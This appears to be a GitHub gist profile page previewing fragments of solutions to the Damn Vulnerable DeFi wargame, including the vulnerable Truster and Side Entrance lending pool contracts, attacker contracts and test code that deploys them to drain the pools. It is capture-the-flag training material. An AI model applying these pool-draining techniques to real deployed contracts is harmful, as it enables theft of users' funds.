Skip to content

Instantly share code, notes, and snippets.

View JuanXavier's full-sized avatar

Juan Xavier Valverde JuanXavier

View GitHub Profile
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import '@openzeppelin/contracts/token/ERC20/ERC20.sol';
import '@openzeppelin/contracts/access/AccessControl.sol';
/**
* @title RewardToken
* @author Damn Vulnerable DeFi (https://damnvulnerabledefi.xyz)
* @dev A mintable ERC20 with 2 decimals to issue rewards
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import '@openzeppelin/contracts/token/ERC20/extensions/ERC20Snapshot.sol';
import '@openzeppelin/contracts/access/AccessControl.sol';
/**
* @title AccountingToken
* @author Damn Vulnerable DeFi (https://damnvulnerabledefi.xyz)
* @notice A limited pseudo-ERC20 token to keep track of deposits and withdrawals
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "../side-entrance/SideEntranceLenderPool.sol";
contract SideEntranceAttack {
SideEntranceLenderPool immutable pool;
address immutable owner;
receive() external payable {}
it('Exploit', async function () {
/** CODE YOUR EXPLOIT HERE */
// Deploy attacker contract
const SideEntranceAttack = await ethers.getContractFactory('SideEntranceAttack', attacker)
attackContract = await SideEntranceAttack.deploy(this.pool.address)
// Log before attack
console.log(
'POOL BALANCE BEFORE ATTACK: ',
String(await ethers.provider.getBalance(this.pool.address))
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import '@openzeppelin/contracts/utils/Address.sol';
interface IFlashLoanEtherReceiver {
function execute() external payable;
}
contract SideEntranceLenderPool {
using Address for address payable;
object "Contract" {
code {
datacopy(0, dataoffset("runtime"), datasize("runtime"))
return(0, datasize("runtime"))
}
object "runtime" {
code {
if iszero(calledByOwner()) { revert(0, 0) }
switch selector()
case 0x00 {
/**
* @dev Performs a Solidity function call using a low level `call`. A
* plain `call` is an unsafe replacement for a function call: use this
* function instead.
*
* If `target` reverts with a revert reason, it is bubbled up by this
* function (like regular Solidity function calls).
*
* Returns the raw returned data. To convert to the expected return value,
* use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
it('Exploit', async function () {
/** CODE YOUR EXPLOIT HERE */
// Deploy attacker contract
const TrusterAttack = await ethers.getContractFactory('TrusterAttack', attacker)
this.attackContract = await TrusterAttack.deploy(this.token.address, this.pool.address)
// Call the drain() function
await this.attackContract.connect(attacker).drain()
})
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import "../truster/TrusterLenderPool.sol";
contract TrusterAttack {
IERC20 immutable dvt;
TrusterLenderPool immutable pool;
address immutable owner;
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import "@openzeppelin/contracts/token/ERC20/IERC20.sol";
import "@openzeppelin/contracts/utils/Address.sol";
import "@openzeppelin/contracts/security/ReentrancyGuard.sol";
contract TrusterLenderPool is ReentrancyGuard {
using Address for address;